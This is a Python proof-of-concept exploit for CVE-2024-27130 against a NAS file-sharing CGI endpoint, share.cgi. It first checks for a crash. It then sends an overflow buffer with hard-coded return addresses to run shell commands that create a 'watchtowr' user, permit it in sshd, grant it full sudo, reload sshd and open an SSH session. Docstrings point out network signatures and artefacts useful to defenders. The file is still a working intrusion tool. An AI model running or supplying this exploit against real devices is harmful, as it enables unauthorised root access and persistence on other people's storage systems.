import argparse
import os
import requests
import urllib3
from colorama import init, Fore, Style
# Initialize colorama so the Fore/Style escape codes below render on Windows consoles too
init()
# Silence the per-request InsecureRequestWarning: every requests.post() in this file passes
# verify=False, i.e. the NAS's TLS certificate is never validated and MITM is not detected.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Startup banner. This is an f-string, so the {Fore.*}/{Style.*} colour codes are substituted
# at import time; the leading whitespace of the art appears to have been stripped in this
# copy, so it may not render exactly as the author drew it. Purely cosmetic.
ascii_art = f"""
{Fore.RED} . .
{Fore.GREEN} |\ |\\
{Fore.YELLOW} _..;|;__;|;
,' ';` \\';`-.
7;-.. : )
.--._)| `;==,|,=='
`\\`@; \\_ `<`G," G).
`\\/-;,( ) .>. )
< ,-;'-.__.;'
`\\_ `-,__,
{Style.RESET_ALL} `;;;;
"""
# Define colors for logging
# Log level -> ANSI colour prefix consumed by log(); levels not listed here fall back to
# Fore.WHITE inside log().
colors = dict(
    INFO=Fore.GREEN,
    ERROR=Fore.RED,
    WARNING=Fore.YELLOW,
)
# Function to log messages with colors
def log(message, level='INFO'):
    """Print *message* on stdout as ``[level] message``, coloured per the module-level ``colors`` map.

    Args:
        message: text to print (anything with a str form).
        level: log level label; a key of ``colors`` selects the colour, any other
            value is printed in Fore.WHITE. The label itself is printed verbatim.
    """
    prefix = colors.get(level, Fore.WHITE)
    print("{}[{}] {}{}".format(prefix, level, message, Style.RESET_ALL))
def check_vulnerability(host):
    """Probe *host* for CVE-2024-27130 and print a verdict on stdout.

    Sends a single POST to ``/cgi-bin/filemanager/share.cgi`` with
    ``func=get_file_size`` and a 10000-byte ``name`` value — the same endpoint
    and form fields docmd() uses — and reports "vulnerable" when the response
    is HTTP 200 and its body contains the text "SIGSEGV". An oversized ``name``
    parameter to share.cgi is therefore the request shape a WAF or access-log
    rule can key on.

    Args:
        host: hostname or IP of the NAS. TLS certificate validation is disabled
            (verify=False) and the request times out after 5 seconds.

    Returns:
        None. The result is only printed; the caller does not branch on it.

    Raises:
        SystemExit: on a non-200 status or on any exception from the request,
            after printing a message. (SystemExit is not an Exception subclass,
            so the ``except`` below does not intercept it.)
    """
    endpoint = f"https://{host}/cgi-bin/filemanager/share.cgi"
    form = {
        'func': 'get_file_size',
        'total': '1',
        'path': '/',
        'name': 'A' * 10000
    }
    try:
        resp = requests.post(endpoint, data=form, verify=False, timeout=5)
        if resp.status_code != 200:
            print(f"Failed to check vulnerability for {host}. Status code: {resp.status_code}")
            raise SystemExit()  # Halt execution if there's an error
        # The crash marker in the response body is the only vulnerability signal used.
        verdict = "vulnerable" if "SIGSEGV" in resp.text else "not vulnerable"
        print(f"The target {host} is {verdict} to CVE-2024-27130")
    except Exception as e:
        print(f"An error occurred while checking vulnerability for {host}: {str(e)}")
        raise SystemExit()  # Halt execution if there's an error
def main(args):
    """Run the four post-exploitation commands through docmd(), in order.

    Each call hands one shell command string (bytes) to docmd(), which embeds it
    in the share.cgi request. Together the four steps leave durable host
    artefacts on the NAS that an investigator can look for: a new local account
    named "watchtowr", an added name on the AllowUsers line of
    /etc/config/ssh/sshd_config, a new entry in /usr/etc/sudoers, and an sshd
    reload (SIGHUP).

    Args:
        args: parsed CLI namespace. Only ``args.password`` is read here (set in
            the ``__main__`` block from make_random_string(), so it is plain
            alphanumeric and safe to interpolate unquoted); ``host``/``ssid``
            are consumed by docmd().
    """
    # 1. Create local user "watchtowr"; `openssl passwd -6` produces a SHA-512 crypt hash of the generated password.
    docmd(args, f"/../../../../usr/local/bin/useradd -p \"$(openssl passwd -6 {args.password})\" watchtowr #".encode('ascii'))
    # 2. Permit that user in sshd's AllowUsers list (in-place edit of /etc/config/ssh/sshd_config).
    docmd(args, b"/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config # ")
    # 3. Grant the user unrestricted sudo by appending to /usr/etc/sudoers.
    docmd(args, b"/../../../../bin/echo watchtowr ALL=\\\\(ALL\\\\) ALL >> /usr/etc/sudoers # ")
    # 4. SIGHUP sshd so it re-reads the edited configuration.
    docmd(args, b"/../../../../usr/bin/killall -SIGHUP sshd # ")
def docmd(args, cmd):
    """Send one command to the target via the oversized ``name`` field of share.cgi.

    The ``name`` value is built as: ``cmd`` padded with b'A' (0x41) to exactly
    4082 bytes, followed by five little-endian 32-bit words with hard-coded
    values (labelled by the original author as delimiter, r0/r3, r7 and pc;
    their register/address semantics cannot be verified from this file). The
    POST also carries the operator-supplied ``ssid`` together with the same
    ``func``/``total``/``path`` fields check_vulnerability() sends, so both
    functions share one network signature: a multi-kilobyte ``name`` parameter
    posted to /cgi-bin/filemanager/share.cgi.

    Args:
        args: namespace providing ``host`` and ``ssid``.
        cmd: the command as bytes. Must be no longer than 4082 bytes: for a
            longer value ``4082 - len(buf)`` is negative, ``b'A' * negative`` is
            empty, and the buffer silently ends up at a different length than
            intended.

    Raises:
        SystemExit: on any exception from the request (including the 2 s
            timeout), after logging it at ERROR level.

    Note:
        The response is discarded, so there is no success signal; the caller
        simply proceeds to the next command.
    """
    log(f"Executing command: '{cmd}'", level='INFO')
    buf = cmd
    # Pad to exactly 4082 bytes (empty padding if cmd is already longer — see docstring).
    buf = buf + b'A' * (4082 - len(buf))
    # Five fixed 32-bit little-endian words appended after the padding; labels are the author's.
    buf = buf + (0x54140508).to_bytes(4, 'little') # delimiter
    buf = buf + (0x54140508).to_bytes(4, 'little') # r0 and r3
    buf = buf + (0x54140508).to_bytes(4, 'little') #
    buf = buf + (0x54140508).to_bytes(4, 'little') # r7
    buf = buf + (0x73af5148).to_bytes(4, 'little') # pc
    payload = {
        'ssid': args.ssid,
        'func': 'get_file_size',
        'total': '1',
        'path': '/',
        'name': buf
    }
    try:
        # verify=False: no TLS certificate validation; the return value (Response) is not inspected.
        requests.post(
            f"https://{args.host}/cgi-bin/filemanager/share.cgi",
            verify=False,
            data=payload,
            timeout=2
        )
    except Exception as e:
        log(f"Error executing command: {e}", level='ERROR')
        raise SystemExit() # Halt execution if there's an error
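def make_random_string(length=8):
    """Return a random string of *length* characters drawn from a 32-symbol alphabet.

    The alphabet is A–Z without I and O plus the digits 2–9 (no 0 or 1), so the
    result avoids visually ambiguous characters. Each output character comes
    from one byte of os.urandom(); because 256 is a multiple of 32, ``byte % 32``
    is uniform and introduces no modulo bias. If the alphabet is ever changed,
    keep its length a divisor of 256 or switch to secrets.choice().

    Args:
        length: number of characters to produce. Defaults to 8, the value the
            original implementation hard-coded; 8 characters of a 32-symbol
            alphabet is 40 bits of entropy.

    Returns:
        A str of exactly *length* characters; "" when *length* is 0.

    Raises:
        ValueError: if *length* is negative (propagated from os.urandom).
    """
    chars = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
    # len(chars) == 32 divides 256, so the modulo below maps bytes uniformly onto the alphabet.
    return "".join(chars[b % len(chars)] for b in os.urandom(length))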
if __name__ == "__main__":
    # CLI: two positional arguments, the NAS host and a share 'ssid' (per the usage string,
    # a token obtained by having a NAS user share a file with the operator).
    parser = argparse.ArgumentParser(prog='PoC', description='PoC for CVE-2024-27130', usage="Obtain an 'ssid' by requesting a NAS user to share a file to you.")
    parser.add_argument('host')
    parser.add_argument('ssid')
    args = parser.parse_args()
    # Password for the account main() creates; generated fresh per run and printed once below.
    args.password = make_random_string()
    # Print ASCII art
    print(ascii_art)
    try:
        # check_vulnerability() only prints a verdict and returns None, so main() runs even
        # when the target was reported "not vulnerable". Its SystemExit (a BaseException)
        # also bypasses the `except Exception` handler below.
        check_vulnerability(args.host)
        main(args)
        print(f"{Fore.YELLOW}Created new user successfully. Log in with password '{args.password}' when prompted.{Style.RESET_ALL}")
        # Interactive SSH through the local shell. `host` is the operator's own CLI argument,
        # so this is not an injection surface; on the NAS side it produces an sshd login for
        # user "watchtowr", which sshd would normally record in its auth log.
        os.system(f'ssh watchtowr@{args.host}')
    except Exception as e:
        log(f"An error occurred: {e}", level='ERROR')